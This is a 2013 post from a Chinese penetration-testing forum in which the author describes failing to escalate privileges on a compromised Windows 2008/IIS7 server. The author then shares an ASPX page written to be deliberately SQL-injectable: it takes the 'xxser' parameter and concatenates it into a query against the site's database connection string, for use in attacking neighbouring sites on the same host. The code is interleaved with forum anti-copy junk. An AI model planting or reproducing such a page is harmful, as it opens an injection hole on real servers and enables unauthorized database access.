中国网络渗透测试联盟

标题: 利用aspx构造注射来跨站 [打印本页]

---

作者: admin    时间: 2013-3-20 21:32
标题: 利用aspx构造注射来跨站
昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。

/ Q% l5 m" ]( s7 b- F​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
9 t: |) ]- h  C2 m3 [<body>
    <form id="form1" runat="server">
    <div>
     <script language="c#" runat="server">
$ h0 w3 c. I& S  o' J  @            
& ^4 I5 O6 E7 B  b3 @, X& N3 W         void page_init(object sender, EventArgs e)
         {
/ N: L$ f; T8 Z' h) ~# v            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
& w" b( Y% b# @) G" G            
6 H; c' [3 ?/ E6 Y' r1 C  K2 X; I             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
! X* o# ]* l  B             conn.Open();
( O7 C. ~$ t. H! v            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
! x& i" k2 P. z4 y             int x = command.ExecuteNonQuery();
6 Q1 {& a( {! \8 H/ t& c; ?             Response.Write(i+"\n");
: L0 y/ V5 Y) u             Response.Write(x);
             conn.Close();
         }
     
/ K# Y$ `' d8 p  </script>
: W) s! T( L: o4 E) Z    </div>
6 j$ g! s+ V0 l# I- g- f    </form>
8 U" ]& @5 ]8 k8 H</body>
</html>
4 g! F0 y: W" I: u! R9 h

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2